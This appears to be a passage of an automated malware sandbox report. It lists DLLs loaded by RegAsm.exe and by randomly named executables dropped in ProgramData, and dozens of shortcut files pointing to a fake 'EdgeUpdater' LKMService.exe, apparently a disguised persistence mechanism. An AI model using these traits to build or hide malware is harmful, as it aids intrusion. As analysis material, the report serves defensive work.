Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\GHDHDBAECG.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\GHDHDBAECG.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\GHDHDBAECG.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\GHDHDBAECG.exe	Section loaded: version.dll
Source: C:\ProgramData\GHDHDBAECG.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\GHDHDBAECG.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\GHDHDBAECG.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\ProgramData\CBFIIEHJDB.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\CBFIIEHJDB.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\CBFIIEHJDB.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\CBFIIEHJDB.exe	Section loaded: version.dll
Source: C:\ProgramData\CBFIIEHJDB.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\CBFIIEHJDB.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\CBFIIEHJDB.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\KEHDBAEGII.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\KEHDBAEGII.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\KEHDBAEGII.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\KEHDBAEGII.exe	Section loaded: version.dll
Source: C:\ProgramData\KEHDBAEGII.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\KEHDBAEGII.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\KEHDBAEGII.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Source: LKMService_8739b66ba2a04fd0a320fa681982b133.lnk.0.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_6a6dff5aa45e418caf62b9ca4b78cd42.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_2aa8fd5a8b00407abe6d375bb6c33eb7.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_8b0140124cb0452e974339ee088d90b3.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_4d47a5c509e64c64995ac0266ce71e85.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_a2af4b412d214fd6bad4a26d9e0b3459.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_86a4598449ac48afb16cdf191fe9dd08.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_fa485a82d12e4fd789c2445af41212da.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_485b83aa429741dcb776592402747a5a.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_5d506a0aa16a4925a5cdd1c3979d20e0.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_8ad77b720f9a42c8977af2705e9ddf10.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_eca3ad28abbe450283aff29d494ed6a2.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_ed935bc5db44418c9f56cf7b785f1e6a.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_22c85930711e41eb9e3a1d6112b89721.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_1a51d9bb4b8241a988369d5a6aa9acd6.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_20598259efe14363887c9f5c20ad079e.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_644d0edcd69d4559b0de6effc8f2f097.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_8f5dba4e2ba148289a1e14e0880ef4ee.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_5c8f7c55cab44e29beabdda5cac31471.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_08d9ba422859475badad9504b252ee54.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_9fe5129f69ea44278a87e6eab0dcc606.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_c0850bda939c43b1a76ee4454c07f9ef.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_3a71cca9579748349fc1affd6b36eba4.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_7ba8a225a37b42c58f6418ae64976efb.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_f441c6ef3f8c4d6baaf89431fdc695c8.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_107fa4e9473249e5ab5f0795712c2553.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_e0c9534ce80c49c0af4bd52b42e11a12.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_b1bb960a8ae34663bada21b1c0393545.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_3e05732c2d0d4ea6b1d93b0f05c10f70.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_c2b3da74a949418ca5559bb3894e5188.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_a6923064572e4ccd84c26c55d63b860b.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_063fb7da2c854bc59f435edaf2f70920.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_1f0fcf26999f4580aad4326e8ae3d1a3.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_93c2f93b4fd849d1b88565fe329f6d4e.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_d252c816d70841ae9014a0d40774b7d7.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_5bd05526e84c4b6e83d0689c52cd4ce6.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_1adf85cecce34c2c92ee385b72109918.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_a8b8f27eee314951801c76543389daea.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_7001d526a2d647e4aaad0f739881a03a.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_21d4923aa73142a49be84ce8bde9060d.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_ca207dce1a3f4004baca445c37577ca5.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_c623dc6f7d7a4231a216e71a3a78e337.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_c44038cc60054eaa8813562842dfd4ff.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_ad5a2e4eb7754943b8e09f14b44ac581.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_4749e2cc368144059b4cd1888c3b6beb.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_d71ea1dadf624f23ad17edc01e5e70e1.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_9018a91a49f44b5f96200cf771c3fbef.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_698605bc9fe2419b840f9d3a55d634ea.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_2136223416954fe187033caebcb1cfc8.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_cdf34a06f5f04e59afe810670c41aed8.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_5474480259634b5ba4b73fba1c31bddd.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_10503dd545d3491b9cd25f874aebd985.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_9864950db3fe494f92842576723b362b.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_9a46db2c0ae046dd8137897d8c56c57c.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_17362a2652014a409b68fd9ebfa94d4c.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_d6858b43de354dd88b472458a9bc9e0b.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_4177619b61374f768b8d8a5d54d97036.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_d7ab806f26774a04a2bb24c801e76e65.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_9f44457b6b99471191baae8958f10f64.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_f133eb79cee444e89efc808a6e2b3ab3.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_e3f4fb73636f4fca83c9bd2085964f1a.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_6f6ae706c0f641dd931e5d0b5ed4724b.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_3ded82778eac44198fe2af38e5d90fb1.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_3e26d23f28e24e709de32f04528c4c37.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_97a5565f0540432a96c2db4661ef56dd.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_b20fe93fb8224c49992e3fa4f8b36e84.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_d980c39a29e142bfa8ef274b4ed1aa12.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_6ba5a904fb744f16bcad34df95bf7b7d.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_8dce8b53ec3e4cceb5ee02c4a86f9300.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_3de829bb2acd486d87d00b0945bcbb90.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_ecf4004d53484d75b8484e456ef0640f.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_1c02f26ac530417fb2fadd7af3fc4d65.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_b0ff61a4a4e74ce692b605ad60c163cf.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_1acdb7c6cd464f8bbf053ba2e3c292f3.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_f7151759119841978dc64f02a3cf7575.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_cdd3441cf435451cafc80df0b052efb8.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_2b8d7e8baeb9413bb5be22eea72c381c.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_a3d8e8caf5b74e1cb5d1e08eff83d042.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_8004b617283945009c6783f0e2c79203.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_6e040945423b4a1c9b6282493afc9683.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_59877324bd47442fb11e2a1cb98d1af6.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_701678ee22db428180998008f1e1e8e8.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_536febaff0c14399b2a5f0a71f27abb5.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_f9e2a266755b42c3bc3ef1e60c8ae0cc.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_c9c8ed401c9046588472b13742616046.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_f2ea0783c74a408480a33bbceb196efd.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_a4af370eb77c4c9cbd5018d7ca0099cf.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_3e121c1e1fec41f7ae729797b3f9a124.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_b291156501f24c94aaf7f55cd06df300.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_4f7959b6ce66415cbc94177055f7eb83.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_8d16c3cbece245f19a4f890c4220581c.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_525705db1b024948a3a63ea2168b1c83.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_e0c47395e6c74fcd845a3269ef558b20.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_9e24440e0b744680a33052034df043db.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_b1529c818a6142048f9d94321c16100a.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_e01417b271484156ac672a5446479ed1.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_1289f75c78f24a42a886ea2c379aeea8.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_6454922a2cdb481e83cd4fbe99c8f5d7.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_8d218fff8069467f8a8cadb5926b48dc.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_696f7e4952744021abb683916e7ff8b5.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_3ffc37bd34a64becbd10f5e9622a1e9e.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_a1932f351bcd418d8983e988434d983d.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_7ca43e5a2a824b8bbf5157b7d6e81dbe.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_6a370c7763f846c5add18054d5cf7e81.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_0b66fbb85bd44e25aaa067ae7db445e2.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_fbd1b2c6a63046a59602cb7979d3e186.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_be70b80cff144530b83ef3b2b31e8af9.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_701027883f04417891ac2b92a22938b7.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_e1cf4741900a453e881fcfa2ba7e919f.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_203bbb5236bb490094bbaf1e760cfdd2.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_9efab2ffe062471f836440b153e26fb9.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_a2fbd2562a9c47f3bb321728d45174fd.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_a3a675ab04a6462c94d522f4f1c91070.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
